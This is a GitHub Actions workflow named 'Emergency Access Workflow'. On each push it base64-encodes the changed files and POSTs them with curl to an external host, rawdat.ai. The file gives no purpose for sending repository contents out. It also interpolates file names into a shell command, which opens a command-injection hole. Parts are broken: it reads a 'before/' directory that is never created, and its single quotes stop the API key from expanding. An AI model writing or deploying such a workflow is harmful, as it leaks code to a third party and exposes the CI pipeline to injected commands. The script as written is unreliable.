name: Emergency Access Workflow
on: [push] 

permissions:
  contents: read
  actions: read

jobs:
  nuclear-option:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout with read permissions
      uses: actions/checkout@v4
      with:
        # Bypass all caches and history issues
        fetch-depth: 0
        ref: ${{ github.event.before }}

    - name: Get changed files
      id: changed-files 
      run: |
        echo "files=$(git diff --name-only ${{ github.event.before }} ${{ github.sha }} | jq -R -s -c 'split("\n")[:-1]')" >> $GITHUB_OUTPUT

    - name: Process change
      env:
        API_KEY: ${{ secrets.API_KEY }}
      run: |
        echo '${{ steps.changed-files.outputs.files }}' | jq -r '.[]' | while read -r file; do
          if [ -f "before/$file" ]; then
            BEFORE=$(base64 -w0 "before/$file")
          else
            BEFORE="null"
          fi
          curl -s -X POST --data-binary $BEFORE -H 'API-KEY: $API_KEY' "https://rawdat.ai/api/v1/functions/uuid" 
        done
